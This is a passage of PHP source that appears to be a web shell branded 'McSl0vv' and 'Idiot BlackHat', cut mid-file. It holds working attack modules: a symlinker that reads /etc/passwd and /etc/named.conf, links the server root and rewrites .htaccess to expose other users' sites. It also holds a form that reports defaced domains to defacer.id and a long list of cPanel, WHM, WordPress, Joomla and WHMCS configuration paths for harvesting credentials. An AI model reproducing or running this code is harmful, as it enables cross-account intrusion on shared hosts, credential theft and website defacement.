  2337. }
  2338. print "\n";
  2339. }}}
  2340.  
  2341. flush();
  2342.  
  2343. echo "</textarea>
  2344. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2345. </form></center>";
  2346. }
  2347. }
  2348. }
  2349. elseif($_GET['ikiw'] == 'symlink') {
  2350. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $McSl0vv);
  2351. $d0mains = @file("/etc/named.conf");
  2352. ##httaces
  2353. if($d0mains){
  2354. @mkdir("McSl0vv_Sym",0777);
  2355. @chdir("McSl0vv_Sym");
  2356. @exe("ln -s / root");
  2357. $file3 = 'Options Indexes FollowSymLinks
  2358. DirectoryIndex McSl0vv.htm
  2359. AddType text/plain .php
  2360. AddHandler text/plain .php
  2361. Satisfy Any';
  2362. $fp3 = fopen('.htaccess','w');
  2363. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2364. echo "
  2365. <table align=center border=1 style='width:60%;border-color:#333333;'>
  2366. <tr>
  2367. <td align=center><font size=2>S. No.</font></td>
  2368. <td align=center><font size=2>Domains</font></td>
  2369. <td align=center><font size=2>Users</font></td>
  2370. <td align=center><font size=2>Symlink</font></td>
  2371. </tr>";
  2372. $dcount = 1;
  2373. foreach($d0mains as $d0main){
  2374. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2375. flush();
  2376. if(strlen(trim($domains[1][0])) > 2){
  2377. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2378. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  2379. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  2380. <td>".$user['name']."</td>
  2381. <td><a href='$full/McSl0vv_Sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  2382. flush();
  2383. $dcount++;}}}
  2384. echo "</table>";
  2385. }else{
  2386. $TEST=@file('/etc/passwd');
  2387. if ($TEST){
  2388. @mkdir("McSl0vv_Sym",0777);
  2389. @chdir("McSl0vv_Sym");
  2390. exe("ln -s / root");
  2391. $file3 = 'Options Indexes FollowSymLinks
  2392. DirectoryIndex McSl0vv.htm
  2393. AddType text/plain .php
  2394. AddHandler text/plain .php
  2395. Satisfy Any';
  2396. $fp3 = fopen('.htaccess','w');
  2397. $fw3 = fwrite($fp3,$file3);
  2398. @fclose($fp3);
  2399. echo "
  2400. <table align=center border=1><tr>
  2401. <td align=center><font size=3>S. No.</font></td>
  2402. <td align=center><font size=3>Users</font></td>
  2403. <td align=center><font size=3>Symlink</font></td></tr>";
  2404. $dcount = 1;
  2405. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  2406. while(!feof($file)){
  2407. $s = fgets($file);
  2408. $matches = array();
  2409. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  2410. $matches = str_replace("home/","",$matches[1]);
  2411. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2412. continue;
  2413. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2414. <td align=center><font class=txt>" . $matches . "</td>";
  2415. echo "<td align=center><font class=txt><a href=$full/McSl0vv_Sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2416. $dcount++;}fclose($file);
  2417. echo "</table>";}else{if($os != "Windows"){@mkdir("McSl0vv_Sym",0777);@chdir("McSl0vv_Sym");@exe("ln -s / root");$file3 = '
  2418. Options Indexes FollowSymLinks
  2419. DirectoryIndex McSl0vv.htm
  2420. AddType text/plain .php
  2421. AddHandler text/plain .php
  2422. Satisfy Any
  2423. ';
  2424. $fp3 = fopen('.htaccess','w');
  2425. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2426. echo "
  2427. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  2428. <table align=center border=1><tr>
  2429. <td align=center><font size=3>ID</font></td>
  2430. <td align=center><font size=3>Users</font></td>
  2431. <td align=center><font size=3>Symlink</font></td></tr>";
  2432. $temp = "";$val1 = 0;$val2 = 1000;
  2433. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  2434. if ($uid)$temp .= join(':',$uid)."\n";}
  2435. echo '<br/>';$temp = trim($temp);$file5 =
  2436. fopen("test.txt","w");
  2437. fputs($file5,$temp);
  2438. fclose($file5);$dcount = 1;$file =
  2439. fopen("test.txt", "r") or exit("Unable to open file!");
  2440. while(!feof($file)){$s = fgets($file);$matches = array();
  2441. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  2442. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2443. continue;
  2444. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2445. <td align=center><font class=txt>" . $matches . "</td>";
  2446. echo "<td align=center><font class=txt><a href=$full/McSl0vv_Sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2447. $dcount++;}
  2448. fclose($file);
  2449. echo "</table></div></center>";unlink("test.txt");
  2450. } else
  2451. echo "<center><font size=3>Cannot create Symlink</font></center>";
  2452. }
  2453. }
  2454. }
  2455. elseif($_GET['ikiw'] == 'defacerid') {
  2456. echo "<center><form method='post'>
  2457. <u>Defacer</u>: <br>
  2458. <input type='text' name='hekel' size='50' value='McSl0vv'><br>
  2459. <u>Team</u>: <br>
  2460. <input type='text' name='tim' size='50' value='Idiot BlackHat'><br>
  2461. <u>Domains</u>: <br>
  2462. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2463. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2464. </form>";
  2465. $site = explode("\r\n", $_POST['sites']);
  2466. $go = $_POST['go'];
  2467. $hekel = $_POST['hekel'];
  2468. $tim = $_POST['tim'];
  2469. if($go) {
  2470. foreach($site as $sites) {
  2471. $zh = $sites;
  2472. $form_url = "https://defacer.id/archive/notify";
  2473. $data_to_post = array();
  2474. $data_to_post['attacker'] = "$hekel";
  2475. $data_to_post['team'] = "$tim";
  2476. $data_to_post['poc'] = 'SQL Injection';
  2477. $data_to_post['url'] = "$zh";
  2478. $curl = curl_init();
  2479. curl_setopt($curl,CURLOPT_URL, $form_url);
  2480. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2481. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2482. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2483. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2484. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2485. $result = curl_exec($curl);
  2486. echo $result;
  2487. curl_close($curl);
  2488. echo "<br>";
  2489. }
  2490. }
  2491. }
  2492.  
  2493. elseif($_GET['ikiw'] == 'config') {
  2494. if($_POST){
  2495. $passwd = $_POST['passwd'];
  2496. mkdir("McSl0vv_Config", 0777);
  2497. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  2498. $htc = fopen("McSl0vv_Config/.htaccess","w");
  2499. fwrite($htc, $isi_htc);
  2500. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  2501. foreach($user_config[1] as $user_ibh) {
  2502. $user_config_dir = "/home/$user_ibh/public_html/";
  2503. if(is_readable($user_config_dir)) {
  2504. $grab_config = array(
  2505. "/home/$user_ibh/.my.cnf" => "cpanel",
  2506. "/home/$user_ibh/.accesshash" => "WHM-accesshash",
  2507. "/home/$user_ibh/public_html/bw-configs/config.ini" => "BosWeb",
  2508. "/home/$user_ibh/public_html/config/koneksi.php" => "Lokomedia",
  2509. "/home/$user_ibh/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2510. "/home/$user_ibh/public_html/clientarea/configuration.php" => "WHMCS",
  2511. "/home/$user_ibh/public_html/whmcs/configuration.php" => "WHMCS",
  2512. "/home/$user_ibh/public_html/forum/config.php" => "phpBB",
  2513. "/home/$user_ibh/public_html/sites/default/settings.php" => "Drupal",
  2514. "/home/$user_ibh/public_html/config/settings.inc.php" => "PrestaShop",
  2515. "/home/$user_ibh/public_html/app/etc/local.xml" => "Magento",
  2516. "/home/$user_ibh/public_html/admin/config.php" => "OpenCart",
  2517. "/home/$user_ibh/public_html/slconfig.php" => "Sitelok",
  2518. "/home/$user_ibh/public_html/application/config/database.php" => "Ellislab",
  2519. "/home/$user_ibh/public_html/whm/configuration.php" => "WHMCS",
  2520. "/home/$user_ibh/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2521. "/home/$user_ibh/public_html/central/configuration.php" => "WHM Central",
  2522. "/home/$user_ibh/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2523. "/home/$user_ibh/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2524. "/home/$user_ibh/public_html/submitticket.php" => "WHMCS",
  2525. "/home/$user_ibh/public_html/configuration.php" => "Joomla",
  2526. "/home/$user_ibh/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2527. "/home/$user_ibh/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2528. "/home/$user_ibh/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2529. "/home/$user_ibh/public_html/Home/configuration.php" => "JoomlaHome",
  2530. "/home/$user_ibh/public_html/HOME/configuration.php" => "JoomlaHome",
  2531. "/home/$user_ibh/public_html/home/configuration.php" => "JoomlaHome",
  2532. "/home/$user_ibh/public_html/NEW/configuration.php" => "JoomlaNew",
  2533. "/home/$user_ibh/public_html/New/configuration.php" => "JoomlaNew",
  2534. "/home/$user_ibh/public_html/new/configuration.php" => "JoomlaNew",
  2535. "/home/$user_ibh/public_html/News/configuration.php" => "JoomlaNews",
  2536. "/home/$user_ibh/public_html/NEWS/configuration.php" => "JoomlaNews",
  2537. "/home/$user_ibh/public_html/news/configuration.php" => "JoomlaNews",
  2538. "/home/$user_ibh/public_html/Cms/configuration.php" => "JoomlaCms",
  2539. "/home/$user_ibh/public_html/CMS/configuration.php" => "JoomlaCms",
  2540. "/home/$user_ibh/public_html/cms/configuration.php" => "JoomlaCms",
  2541. "/home/$user_ibh/public_html/Main/configuration.php" => "JoomlaMain",
  2542. "/home/$user_ibh/public_html/MAIN/configuration.php" => "JoomlaMain",
  2543. "/home/$user_ibh/public_html/main/configuration.php" => "JoomlaMain",
  2544. "/home/$user_ibh/public_html/Blog/configuration.php" => "JoomlaBlog",
  2545. "/home/$user_ibh/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2546. "/home/$user_ibh/public_html/blog/configuration.php" => "JoomlaBlog",
  2547. "/home/$user_ibh/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2548. "/home/$user_ibh/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2549. "/home/$user_ibh/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2550. "/home/$user_ibh/public_html/beta/configuration.php" => "JoomlaBeta",
  2551. "/home/$user_ibh/public_html/Beta/configuration.php" => "JoomlaBeta",
  2552. "/home/$user_ibh/public_html/BETA/configuration.php" => "JoomlaBeta",
  2553. "/home/$user_ibh/public_html/PRESS/configuration.php" => "JoomlaPress",
  2554. "/home/$user_ibh/public_html/Press/configuration.php" => "JoomlaPress",
  2555. "/home/$user_ibh/public_html/press/configuration.php" => "JoomlaPress",
  2556. "/home/$user_ibh/public_html/Wp/configuration.php" => "JoomlaWp",
  2557. "/home/$user_ibh/public_html/wp/configuration.php" => "JoomlaWp",
  2558. "/home/$user_ibh/public_html/WP/configuration.php" => "JoomlaWP",
  2559. "/home/$user_ibh/public_html/portal/configuration.php" => "JoomlaPortal",
  2560. "/home/$user_ibh/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2561. "/home/$user_ibh/public_html/Portal/configuration.php" => "JoomlaPortal",
  2562. "/home/$user_ibh/public_html/wp-config.php" => "WordPress",
  2563. "/home/$user_ibh/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2564. "/home/$user_ibh/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2565. "/home/$user_ibh/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2566. "/home/$user_ibh/public_html/Home/wp-config.php" => "WordPressHome",
  2567. "/home/$user_ibh/public_html/HOME/wp-config.php" => "WordPressHome",
  2568. "/home/$user_ibh/public_html/home/wp-config.php" => "WordPressHome",
  2569. "/home/$user_ibh/public_html/NEW/wp-config.php" => "WordPressNew",
  2570. "/home/$user_ibh/public_html/New/wp-config.php" => "WordPressNew",
  2571. "/home/$user_ibh/public_html/new/wp-config.php" => "WordPressNew",
  2572. "/home/$user_ibh/public_html/News/wp-config.php" => "WordPressNews",
  2573. "/home/$user_ibh/public_html/NEWS/wp-config.php" => "WordPressNews",
  2574. "/home/$user_ibh/public_html/news/wp-config.php" => "WordPressNews",
  2575. "/home/$user_ibh/public_html/Cms/wp-config.php" => "WordPressCms",
  2576. "/home/$user_ibh/public_html/CMS/wp-config.php" => "WordPressCms",
  2577. "/home/$user_ibh/public_html/cms/wp-config.php" => "WordPressCms",
  2578. "/home/$user_ibh/public_html/Main/wp-config.php" => "WordPressMain",
  2579. "/home/$user_ibh/public_html/MAIN/wp-config.php" => "WordPressMain",
  2580. "/home/$user_ibh/public_html/main/wp-config.php" => "WordPressMain",
  2581. "/home/$user_ibh/public_html/Blog/wp-config.php" => "WordPressBlog",
  2582. "/home/$user_ibh/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2583. "/home/$user_ibh/public_html/blog/wp-config.php" => "WordPressBlog",
  2584. "/home/$user_ibh/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2585. "/home/$user_ibh/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2586. "/home/$user_ibh/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2587. "/home/$user_ibh/public_html/beta/wp-config.php" => "WordPressBeta",
  2588. "/home/$user_ibh/public_html/Beta/wp-config.php" => "WordPressBeta",
  2589. "/home/$user_ibh/public_html/BETA/wp-config.php" => "WordPressBeta",
  2590. "/home/$user_ibh/public_html/PRESS/wp-config.php" => "WordPressPress",
  2591. "/home/$user_ibh/public_html/Press/wp-config.php" => "WordPressPress",
  2592. "/home/$user_ibh/public_html/press/wp-config.php" => "WordPressPress",
  2593. "/home/$user_ibh/public_html/Wp/wp-config.php" => "WordPressWp",
  2594. "/home/$user_ibh/public_html/wp/wp-config.php" => "WordPressWp",
  2595. "/home/$user_ibh/public_html/WP/wp-config.php" => "WordPressWP",
  2596. "/home/$user_ibh/public_html/portal/wp-config.php" => "WordPressPortal",
  2597. "/home/$user_ibh/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2598. "/home/$user_ibh/public_html/Portal/wp-config.php" => "WordPressPortal",
  2599. "/home1/$user_ibh/.my.cnf" => "cpanel",
  2600. "/home1/$user_ibh/.accesshash" => "WHM-accesshash",
  2601. "/home1/$user_ibh/public_html/bw-configs/config.ini" => "BosWeb",
  2602. "/home1/$user_ibh/public_html/config/koneksi.php" => "Lokomedia",
  2603. "/home1/$user_ibh/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2604. "/home1/$user_ibh/public_html/clientarea/configuration.php" => "WHMCS",
  2605. "/home1/$user_ibh/public_html/whmcs/configuration.php" => "WHMCS",
  2606. "/home1/$user_ibh/public_html/forum/config.php" => "phpBB",
  2607. "/home1/$user_ibh/public_html/sites/default/settings.php" => "Drupal",
  2608. "/home1/$user_ibh/public_html/config/settings.inc.php" => "PrestaShop",
  2609. "/home1/$user_ibh/public_html/app/etc/local.xml" => "Magento",
  2610. "/home1/$user_ibh/public_html/admin/config.php" => "OpenCart",
  2611. "/home1/$user_ibh/public_html/slconfig.php" => "Sitelok",
  2612. "/home1/$user_ibh/public_html/application/config/database.php" => "Ellislab",
  2613. "/home1/$user_ibh/public_html/whm/configuration.php" => "WHMCS",
  2614. "/home1/$user_ibh/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2615. "/home1/$user_ibh/public_html/central/configuration.php" => "WHM Central",
  2616. "/home1/$user_ibh/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2617. "/home1/$user_ibh/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2618. "/home1/$user_ibh/public_html/submitticket.php" => "WHMCS",
  2619. "/home1/$user_ibh/public_html/configuration.php" => "Joomla",
  2620. "/home1/$user_ibh/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2621. "/home1/$user_ibh/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2622. "/home1/$user_ibh/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2623. "/home1/$user_ibh/public_html/Home/configuration.php" => "JoomlaHome",
  2624. "/home1/$user_ibh/public_html/HOME/configuration.php" => "JoomlaHome",
  2625. "/home1/$user_ibh/public_html/home/configuration.php" => "JoomlaHome",
  2626. "/home1/$user_ibh/public_html/NEW/configuration.php" => "JoomlaNew",
  2627. "/home1/$user_ibh/public_html/New/configuration.php" => "JoomlaNew",
  2628. "/home1/$user_ibh/public_html/new/configuration.php" => "JoomlaNew",
  2629. "/home1/$user_ibh/public_html/News/configuration.php" => "JoomlaNews",
  2630. "/home1/$user_ibh/public_html/NEWS/configuration.php" => "JoomlaNews",
  2631. "/home1/$user_ibh/public_html/news/configuration.php" => "JoomlaNews",
  2632. "/home1/$user_ibh/public_html/Cms/configuration.php" => "JoomlaCms",
  2633. "/home1/$user_ibh/public_html/CMS/configuration.php" => "JoomlaCms",
  2634. "/home1/$user_ibh/public_html/cms/configuration.php" => "JoomlaCms",
  2635. "/home1/$user_ibh/public_html/Main/configuration.php" => "JoomlaMain",
  2636. "/home1/$user_ibh/public_html/MAIN/configuration.php" => "JoomlaMain",
  2637. "/home1/$user_ibh/public_html/main/configuration.php" => "JoomlaMain",
  2638. "/home1/$user_ibh/public_html/Blog/configuration.php" => "JoomlaBlog",
  2639. "/home1/$user_ibh/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2640. "/home1/$user_ibh/public_html/blog/configuration.php" => "JoomlaBlog",
  2641. "/home1/$user_ibh/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2642. "/home1/$user_ibh/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2643. "/home1/$user_ibh/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2644. "/home1/$user_ibh/public_html/beta/configuration.php" => "JoomlaBeta",
  2645. "/home1/$user_ibh/public_html/Beta/configuration.php" => "JoomlaBeta",
  2646. "/home1/$user_ibh/public_html/BETA/configuration.php" => "JoomlaBeta",
  2647. "/home1/$user_ibh/public_html/PRESS/configuration.php" => "JoomlaPress",
  2648. "/home1/$user_ibh/public_html/Press/configuration.php" => "JoomlaPress",
  2649. "/home1/$user_ibh/public_html/press/configuration.php" => "JoomlaPress",
  2650. "/home1/$user_ibh/public_html/Wp/configuration.php" => "JoomlaWp",
  2651. "/home1/$user_ibh/public_html/wp/configuration.php" => "JoomlaWp",
  2652. "/home1/$user_ibh/public_html/WP/configuration.php" => "JoomlaWP",
  2653. "/home1/$user_ibh/public_html/portal/configuration.php" => "JoomlaPortal",
  2654. "/home1/$user_ibh/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2655. "/home1/$user_ibh/public_html/Portal/configuration.php" => "JoomlaPortal",
  2656. "/home1/$user_ibh/public_html/wp-config.php" => "WordPress",
  2657. "/home1/$user_ibh/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2658. "/home1/$user_ibh/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2659. "/home1/$user_ibh/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2660. "/home1/$user_ibh/public_html/Home/wp-config.php" => "WordPressHome",
  2661. "/home1/$user_ibh/public_html/HOME/wp-config.php" => "WordPressHome",
  2662. "/home1/$user_ibh/public_html/home/wp-config.php" => "WordPressHome",
  2663. "/home1/$user_ibh/public_html/NEW/wp-config.php" => "WordPressNew",
  2664. "/home1/$user_ibh/public_html/New/wp-config.php" => "WordPressNew",
  2665. "/home1/$user_ibh/public_html/new/wp-config.php" => "WordPressNew",
  2666. "/home1/$user_ibh/public_html/News/wp-config.php" => "WordPressNews",
  2667. "/home1/$user_ibh/public_html/NEWS/wp-config.php" => "WordPressNews",
  2668. "/home1/$user_ibh/public_html/news/wp-config.php" => "WordPressNews",
  2669. "/home1/$user_ibh/public_html/Cms/wp-config.php" => "WordPressCms",
  2670. "/home1/$user_ibh/public_html/CMS/wp-config.php" => "WordPressCms",
  2671. "/home1/$user_ibh/public_html/cms/wp-config.php" => "WordPressCms",
  2672. "/home1/$user_ibh/public_html/Main/wp-config.php" => "WordPressMain",
  2673. "/home1/$user_ibh/public_html/MAIN/wp-config.php" => "WordPressMain",
  2674. "/home1/$user_ibh/public_html/main/wp-config.php" => "WordPressMain",
  2675. "/home1/$user_ibh/public_html/Blog/wp-config.php" => "WordPressBlog",
  2676. "/home1/$user_ibh/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2677. "/home1/$user_ibh/public_html/blog/wp-config.php" => "WordPressBlog",
  2678. "/home1/$user_ibh/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2679. "/home1/$user_ibh/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2680. "/home1/$user_ibh/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2681. "/home1/$user_ibh/public_html/beta/wp-config.php" => "WordPressBeta",
  2682. "/home1/$user_ibh/public_html/Beta/wp-config.php" => "WordPressBeta",
  2683. "/home1/$user_ibh/public_html/BETA/wp-config.php" => "WordPressBeta",
  2684. "/home1/$user_ibh/public_html/PRESS/wp-config.php" => "WordPressPress",
  2685. "/home1/$user_ibh/public_html/Press/wp-config.php" => "WordPressPress",
  2686. "/home1/$user_ibh/public_html/press/wp-config.php" => "WordPressPress",
  2687. "/home1/$user_ibh/public_html/Wp/wp-config.php" => "WordPressWp",
  2688. "/home1/$user_ibh/public_html/wp/wp-config.php" => "WordPressWp",
  2689. "/home1/$user_ibh/public_html/WP/wp-config.php" => "WordPressWP",
  2690. "/home1/$user_ibh/public_html/portal/wp-config.php" => "WordPressPortal",
  2691. "/home1/$user_ibh/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2692. "/home1/$user_ibh/public_html/Portal/wp-config.php" => "WordPressPortal",
  2693. "/home2/$user_ibh/.my.cnf" => "cpanel",
  2694. "/home2/$user_ibh/.accesshash" => "WHM-accesshash",
  2695. "/home2/$user_ibh/public_html/bw-configs/config.ini" => "BosWeb",
  2696. "/home2/$user_ibh/public_html/config/koneksi.php" => "Lokomedia",
  2697. "/home2/$user_ibh/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2698. "/home2/$user_ibh/public_html/clientarea/configuration.php" => "WHMCS",
  2699. "/home2/$user_ibh/public_html/whmcs/configuration.php" => "WHMCS",
  2700. "/home2/$user_ibh/public_html/forum/config.php" => "phpBB",
  2701. "/home2/$user_ibh/public_html/sites/default/settings.php" => "Drupal",
  2702. "/home2/$user_ibh/public_html/config/settings.inc.php" => "PrestaShop",
  2703. "/home2/$user_ibh/public_html/app/etc/local.xml" => "Magento",
  2704. "/home2/$user_ibh/public_html/admin/config.php" => "OpenCart",
  2705. "/home2/$user_ibh/public_html/slconfig.php" => "Sitelok",
  2706. "/home2/$user_ibh/public_html/application/config/database.php" => "Ellislab",
  2707. "/home2/$user_ibh/public_html/whm/configuration.php" => "WHMCS",
  2708. "/home2/$user_ibh/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2709. "/home2/$user_ibh/public_html/central/configuration.php" => "WHM Central",
  2710. "/home2/$user_ibh/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2711. "/home2/$user_ibh/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2712. "/home2/$user_ibh/public_html/submitticket.php" => "WHMCS",
  2713. "/home2/$user_ibh/public_html/configuration.php" => "Joomla",
  2714. "/home2/$user_ibh/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2715. "/home2/$user_ibh/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2716. "/home2/$user_ibh/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2717. "/home2/$user_ibh/public_html/Home/configuration.php" => "JoomlaHome",
  2718. "/home2/$user_ibh/public_html/HOME/configuration.php" => "JoomlaHome",
  2719. "/home2/$user_ibh/public_html/home/configuration.php" => "JoomlaHome",
  2720. "/home2/$user_ibh/public_html/NEW/configuration.php" => "JoomlaNew",
  2721. "/home2/$user_ibh/public_html/New/configuration.php" => "JoomlaNew",
  2722. "/home2/$user_ibh/public_html/new/configuration.php" => "JoomlaNew",
  2723. "/home2/$user_ibh/public_html/News/configuration.php" => "JoomlaNews",
  2724. "/home2/$user_ibh/public_html/NEWS/configuration.php" => "JoomlaNews",
  2725. "/home2/$user_ibh/public_html/news/configuration.php" => "JoomlaNews",
  2726. "/home2/$user_ibh/public_html/Cms/configuration.php" => "JoomlaCms",
  2727. "/home2/$user_ibh/public_html/CMS/configuration.php" => "JoomlaCms",
  2728. "/home2/$user_ibh/public_html/cms/configuration.php" => "JoomlaCms",
  2729. "/home2/$user_ibh/public_html/Main/configuration.php" => "JoomlaMain",
  2730. "/home2/$user_ibh/public_html/MAIN/configuration.php" => "JoomlaMain",
  2731. "/home2/$user_ibh/public_html/main/configuration.php" => "JoomlaMain",
  2732. "/home2/$user_ibh/public_html/Blog/configuration.php" => "JoomlaBlog",
  2733. "/home2/$user_ibh/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2734. "/home2/$user_ibh/public_html/blog/configuration.php" => "JoomlaBlog",
  2735. "/home2/$user_ibh/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2736. "/home2/$user_ibh/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2737. "/home2/$user_ibh/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2738. "/home2/$user_ibh/public_html/beta/configuration.php" => "JoomlaBeta",
  2739. "/home2/$user_ibh/public_html/Beta/configuration.php" => "JoomlaBeta",
  2740. "/home2/$user_ibh/public_html/BETA/configuration.php" => "JoomlaBeta",
  2741. "/home2/$user_ibh/public_html/PRESS/configuration.php" => "JoomlaPress",
  2742. "/home2/$user_ibh/public_html/Press/configuration.php" => "JoomlaPress",
  2743. "/home2/$user_ibh/public_html/press/configuration.php" => "JoomlaPress",
  2744. "/home2/$user_ibh/public_html/Wp/configuration.php" => "JoomlaWp",
  2745. "/home2/$user_ibh/public_html/wp/configuration.php" => "JoomlaWp",
  2746. "/home2/$user_ibh/public_html/WP/configuration.php" => "JoomlaWP",
  2747. "/home2/$user_ibh/public_html/portal/configuration.php" => "JoomlaPortal",
  2748. "/home2/$user_ibh/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2749. "/home2/$user_ibh/public_html/Portal/configuration.php" => "JoomlaPortal",
  2750. "/home2/$user_ibh/public_html/wp-config.php" => "WordPress",
  2751. "/home2/$user_ibh/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2752. "/home2/$user_ibh/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2753. "/home2/$user_ibh/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2754. "/home2/$user_ibh/public_html/Home/wp-config.php" => "WordPressHome",
  2755. "/home2/$user_ibh/public_html/HOME/wp-config.php" => "WordPressHome",
  2756. "/home2/$user_ibh/public_html/home/wp-config.php" => "WordPressHome",
  2757. "/home2/$user_ibh/public_html/NEW/wp-config.php" => "WordPressNew",
  2758. "/home2/$user_ibh/public_html/New/wp-config.php" => "WordPressNew",
  2759. "/home2/$user_ibh/public_html/new/wp-config.php" => "WordPressNew",
  2760. "/home2/$user_ibh/public_html/News/wp-config.php" => "WordPressNews",
  2761. "/home2/$user_ibh/public_html/NEWS/wp-config.php" => "WordPressNews",
  2762. "/home2/$user_ibh/public_html/news/wp-config.php" => "WordPressNews",
  2763. "/home2/$user_ibh/public_html/Cms/wp-config.php" => "WordPressCms",
  2764. "/home2/$user_ibh/public_html/CMS/wp-config.php" => "WordPressCms",
  2765. "/home2/$user_ibh/public_html/cms/wp-config.php" => "WordPressCms",
  2766. "/home2/$user_ibh/public_html/Main/wp-config.php" => "WordPressMain",
  2767. "/home2/$user_ibh/public_html/MAIN/wp-config.php" => "WordPressMain",
  2768. "/home2/$user_ibh/public_html/main/wp-config.php" => "WordPressMain",
  2769. "/home2/$user_ibh/public_html/Blog/wp-config.php" => "WordPressBlog",
  2770. "/home2/$user_ibh/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2771. "/home2/$user_ibh/public_html/blog/wp-config.php" => "WordPressBlog",
  2772. "/home2/$user_ibh/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2773. "/home2/$user_ibh/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2774. "/home2/$user_ibh/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2775. "/home2/$user_ibh/public_html/beta/wp-config.php" => "WordPressBeta",
  2776. "/home2/$user_ibh/public_html/Beta/wp-config.php" => "WordPressBeta",
